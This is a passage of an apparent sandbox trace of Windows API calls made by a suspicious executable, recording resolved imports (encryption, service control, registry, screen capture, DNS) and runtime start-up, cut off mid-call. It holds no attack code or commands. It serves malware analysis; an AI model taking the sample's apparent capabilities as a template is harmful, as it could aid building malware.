[0046.920] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0046.920] GetProcAddress (hModule=0x76e10000, lpProcName="AreFileApisANSI") returned 0x76ea40d1 [0046.920] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0046.920] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0046.920] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0046.921] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalFree") returned 0x76e25558 [0046.921] GetProcAddress (hModule=0x76e10000, lpProcName="SetEndOfFile") returned 0x76e3ce2e [0046.921] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleInputA") returned 0x76ec6f53 [0046.921] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0046.921] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0046.921] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0046.921] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0046.921] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0046.922] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0046.922] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0046.922] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0046.922] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0046.922] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0046.922] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0046.922] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0046.922] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0046.923] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0046.923] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0046.923] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0046.923] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0046.923] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0046.923] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThread") returned 0x76e217ec [0046.923] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0046.923] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0046.924] GetProcAddress (hModule=0x76780000, lpProcName="PeekMessageW") returned 0x767a05ba [0046.924] GetProcAddress (hModule=0x76780000, lpProcName="PostThreadMessageW") returned 0x76798bff [0046.924] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcW") returned 0x773525dd [0046.924] GetProcAddress (hModule=0x76780000, lpProcName="DispatchMessageW") returned 0x7679787b [0046.924] GetProcAddress (hModule=0x76780000, lpProcName="UpdateWindow") returned 0x767a3559 [0046.924] GetProcAddress (hModule=0x76780000, lpProcName="CreateWindowExW") returned 0x76798a29 [0046.924] GetProcAddress (hModule=0x76780000, lpProcName="LoadCursorW") returned 0x767988f7 [0046.924] GetProcAddress (hModule=0x76780000, lpProcName="IsWindow") returned 0x76797136 [0046.925] GetProcAddress (hModule=0x76780000, lpProcName="ShowWindow") returned 0x767a0dfb [0046.925] GetProcAddress (hModule=0x76780000, lpProcName="RegisterClassExW") returned 0x7679b17d [0046.925] GetProcAddress (hModule=0x76780000, lpProcName="PostQuitMessage") returned 0x76799abb [0046.925] GetProcAddress (hModule=0x76780000, lpProcName="GetMessageW") returned 0x767978e2 [0046.925] GetProcAddress (hModule=0x76780000, lpProcName="DestroyWindow") returned 0x76799a55 [0046.925] GetProcAddress (hModule=0x76780000, lpProcName="SendMessageW") returned 0x76799679 [0046.925] GetProcAddress (hModule=0x76780000, lpProcName="GetProcessWindowStation") returned 0x76799eea [0046.925] GetProcAddress (hModule=0x76780000, lpProcName="GetUserObjectInformationW") returned 0x76798068 [0046.926] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxA") returned 0x767efd1e [0046.926] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0046.926] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxW") returned 0x767efd3f [0046.926] GetProcAddress (hModule=0x76780000, lpProcName="TranslateMessage") returned 0x76797809 [0046.926] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0046.926] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0046.926] GetProcAddress (hModule=0x754b0000, lpProcName="CloseServiceHandle") returned 0x754c369c [0046.926] GetProcAddress (hModule=0x754b0000, lpProcName="GetUserNameW") returned 0x754c157a [0046.927] GetProcAddress (hModule=0x754b0000, lpProcName="ReportEventA") returned 0x754b3ee9 [0046.927] GetProcAddress (hModule=0x754b0000, lpProcName="RegisterEventSourceA") returned 0x754c2d46 [0046.927] GetProcAddress (hModule=0x754b0000, lpProcName="DeregisterEventSource") returned 0x754c35dd [0046.927] GetProcAddress (hModule=0x754b0000, lpProcName="CryptHashData") returned 0x754bdf36 [0046.927] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExW") returned 0x754c14d6 [0046.927] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0046.927] GetProcAddress (hModule=0x754b0000, lpProcName="ControlService") returned 0x754d7144 [0046.927] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0046.928] GetProcAddress (hModule=0x754b0000, lpProcName="CryptCreateHash") returned 0x754bdf4e [0046.928] GetProcAddress (hModule=0x754b0000, lpProcName="CryptEncrypt") returned 0x754d779b [0046.928] GetProcAddress (hModule=0x754b0000, lpProcName="CryptImportKey") returned 0x754bc532 [0046.928] GetProcAddress (hModule=0x754b0000, lpProcName="QueryServiceStatus") returned 0x754c2a86 [0046.928] GetProcAddress (hModule=0x754b0000, lpProcName="RegQueryValueExW") returned 0x754c46ad [0046.928] GetProcAddress (hModule=0x754b0000, lpProcName="CryptReleaseContext") returned 0x754be124 [0046.928] GetProcAddress (hModule=0x754b0000, lpProcName="OpenServiceW") returned 0x754bca4c [0046.928] GetProcAddress (hModule=0x754b0000, lpProcName="OpenSCManagerW") returned 0x754bca64 [0046.928] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextW") returned 0x754bdf14 [0046.928] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetHashParam") returned 0x754bdf7e [0046.928] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0049.770] GetProcAddress (hModule=0x75670000, lpProcName="SHGetPathFromIDListW") returned 0x757017bf [0049.771] GetProcAddress (hModule=0x75670000, lpProcName="SHGetSpecialFolderLocation") returned 0x756fe141 [0049.771] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteA") returned 0x758b7078 [0049.771] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteExW") returned 0x75691e46 [0049.771] GetProcAddress (hModule=0x75670000, lpProcName="CommandLineToArgvW") returned 0x75689ee8 [0049.771] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathA") returned 0x75787804 [0049.771] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x762c0000 [0049.771] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitialize") returned 0x762db636 [0049.772] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitializeSecurity") returned 0x762e7259 [0049.780] GetProcAddress (hModule=0x762c0000, lpProcName="CoUninitialize") returned 0x763086d3 [0049.780] GetProcAddress (hModule=0x762c0000, lpProcName="CoCreateInstance") returned 0x76309d0b [0049.780] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x769d0000 [0049.780] GetProcAddress (hModule=0x769d0000, lpProcName=0x6) returned 0x769d3e59 [0049.781] GetProcAddress (hModule=0x769d0000, lpProcName=0x8) returned 0x769d3ed5 [0049.781] GetProcAddress (hModule=0x769d0000, lpProcName=0x9) returned 0x769d3eae [0049.781] GetProcAddress (hModule=0x769d0000, lpProcName=0xc8) returned 0x769d3f21 [0049.781] GetProcAddress (hModule=0x769d0000, lpProcName=0xca) returned 0x769dfd6b [0049.781] GetProcAddress (hModule=0x769d0000, lpProcName=0xc9) returned 0x769d4af8 [0049.781] GetProcAddress (hModule=0x769d0000, lpProcName=0xc) returned 0x769d5dee [0049.781] GetProcAddress (hModule=0x769d0000, lpProcName=0x2) returned 0x769d4642 [0049.781] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x74500000 [0050.089] GetProcAddress (hModule=0x74500000, lpProcName="GetAdaptersInfo") returned 0x74509263 [0050.089] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75360000 [0050.482] GetProcAddress (hModule=0x75360000, lpProcName=0xc) returned 0x7536b131 [0050.482] GetProcAddress (hModule=0x75360000, lpProcName=0xb) returned 0x7536311b [0050.483] GetProcAddress (hModule=0x75360000, lpProcName=0x34) returned 0x75377673 [0050.483] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x744a0000 [0050.809] GetProcAddress (hModule=0x744a0000, lpProcName="DnsFree") returned 0x744a436b [0050.810] GetProcAddress (hModule=0x744a0000, lpProcName="DnsQuery_W") returned 0x744b572c [0050.810] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75550000 [0050.810] GetProcAddress (hModule=0x75550000, lpProcName="CryptStringToBinaryA") returned 0x75585d77 [0050.810] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x752d0000 [0050.810] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteObject") returned 0x752e5689 [0050.810] GetProcAddress (hModule=0x752d0000, lpProcName="GetObjectA") returned 0x752e85d4 [0050.810] GetProcAddress (hModule=0x752d0000, lpProcName="SelectObject") returned 0x752e4f70 [0050.810] GetProcAddress (hModule=0x752d0000, lpProcName="GetDeviceCaps") returned 0x752e4de0 [0050.811] GetProcAddress (hModule=0x752d0000, lpProcName="GetBitmapBits") returned 0x752ec155 [0050.811] GetProcAddress (hModule=0x752d0000, lpProcName="BitBlt") returned 0x752e5ea6 [0050.811] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteDC") returned 0x752e58b3 [0050.811] GetProcAddress (hModule=0x752d0000, lpProcName="CreateDCA") returned 0x752e7bcc [0050.811] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleDC") returned 0x752e54f4 [0050.811] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleBitmap") returned 0x752e5f49 [0050.811] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x743e0000 [0051.121] GetProcAddress (hModule=0x743e0000, lpProcName="atexit") returned 0x743fc544 [0051.121] atexit (param_1=0x1d70920) returned 0 [0051.128] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f3e8 | out: lpSystemTimeAsFileTime=0x18f3e8*(dwLowDateTime=0x91c53700, dwHighDateTime=0x1d5d6b4)) [0051.128] GetCurrentThreadId () returned 0xaf4 [0051.128] GetCurrentProcessId () returned 0xb04 [0051.128] QueryPerformanceCounter (in: lpPerformanceCount=0x18f3e0 | out: lpPerformanceCount=0x18f3e0*=19160219551) returned 1 [0051.175] GetStartupInfoW (in: lpStartupInfo=0x18f378 | out: lpStartupInfo=0x18f378*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76e23519, hStdOutput=0x7733fd35, hStdError=0x773a7daf)) [0051.187] GetProcessHeap () returned 0x240000 [0051.282] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e10000 [0051.283] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0051.283] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0051.283] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0051.283] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0051.283] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0051.283] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventExW") returned 0x76ea410b [0051.283] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreExW") returned 0x76ea4195 [0051.283] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadStackGuarantee") returned 0x76e2d31f [0051.283] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolTimer") returned 0x76e3ee7e [0051.284] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolTimer") returned 0x7736441c [0051.284] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7738c50e [0051.284] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolTimer") returned 0x7738c381 [0051.284] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolWait") returned 0x76e3f088 [0051.284] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolWait") returned 0x773705d7 [0051.284] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolWait") returned 0x7738ca24 [0051.284] GetProcAddress (hModule=0x76e10000, lpProcName="FlushProcessWriteBuffers") returned 0x77340b8c [0051.284] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x773ffde8 [0051.284] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessorNumber") returned 0x77391e1d [0051.284] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalProcessorInformation") returned 0x76ea4761 [0051.285] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSymbolicLinkW") returned 0x76e9cd11 [0051.285] GetProcAddress (hModule=0x76e10000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0051.285] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesEx") returned 0x76ea424f [0051.285] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringEx") returned 0x76ea46b1 [0051.285] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatEx") returned 0x76eb6676 [0051.285] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoEx") returned 0x76ea4751 [0051.285] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatEx") returned 0x76eb65f1 [0051.285] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLocaleName") returned 0x76ea47c1 [0051.286] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocaleName") returned 0x76ea47e1 [0051.286] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0051.286] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentPackageId") returned 0x0 [0051.286] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount64") returned 0x76e3eee0 [0051.286] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0051.286] GetProcAddress (hModule=0x76e10000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0051.287] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3bc) returned 0x25f430 [0051.287] GetCurrentThreadId () returned 0xaf4 [0051.293] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x18) returned 0x252300 [0051.293] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x800) returned 0x25f7f8 [0051.400] GetStartupInfoW (in: lpStartupInfo=0x18f348 | out: lpStartupInfo=0x18f348*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xe6195f83, hStdError=0x58)) [0051.400] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0051.400] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0051.400] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0051.400] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" " [0051.400] GetEnvironmentStringsW () returned 0x260000* [0051.400] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xaca) returned 0x260ad8 [0051.406] FreeEnvironmentStringsW (penv=0x260000) returned 1 [0051.413] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\243e.tmp.exe.del105265203.del105731312.exe")) returned 0x50 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0xaa) returned 0x2615b0 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x98) returned 0x261668 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3e) returned 0x254f90 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x6c) returned 0x261708 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x6e) returned 0x261780 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x78) returned 0x252e70 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x62) returned 0x2617f8 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x25b100 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x256ce0 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x28) returned 0x25aaf0 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1a) returned 0x25f1e8 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4a) returned 0x261868 [0051.413] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x72) returned 0x252ef0 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x25b138 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x25b170 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1c) returned 0x25f210 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xd2) returned 0x2618c0 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x7c) returned 0x2619a0 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x36) returned 0x261a28 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3a) returned 0x254fd8 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x90) returned 0x261a68 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x25ab20 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x25b1a8 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x36) returned 0x261b00 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x48) returned 0x256d30 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x52) returned 0x261b40 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3c) returned 0x255020 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x82) returned 0x261ba0 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2e) returned 0x25b1e0 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x1e) returned 0x25f238 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2c) returned 0x25b218 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x261c30 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x52) returned 0x261c90 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x2a) returned 0x25b250 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x3c) returned 0x255068 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x54) returned 0x261cf0 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x24) returned 0x25ab50 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x30) returned 0x25b288 [0051.414] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8c) returned 0x261d50 [0051.414] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x260ad8 | out: hHeap=0x240000) returned 1 [0051.462] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x800) returned 0x260000 [0051.468] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x80) returned 0x261de8 [0051.498] GetLastError () returned 0x0 [0051.498] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x0, Size=0x220) returned 0x260808 [0051.498] GetLastError () returned 0x0 [0051.498] IsValidCodePage (CodePage=0x4e4) returned 1 [0051.499] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f33c | out: lpCPInfo=0x18f33c) returned 1 [0051.505] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ee04 | out: lpCPInfo=0x18ee04) returned 1 [0051.510] GetLastError () returned 0x0 [0051.516] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0051.517] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e948, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0051.517] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f118, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ3_\x19æTó\x18", lpUsedDefaultChar=0x0) returned 256 [0051.517] GetLastError () returned 0x0 [0051.517] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0051.517] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" 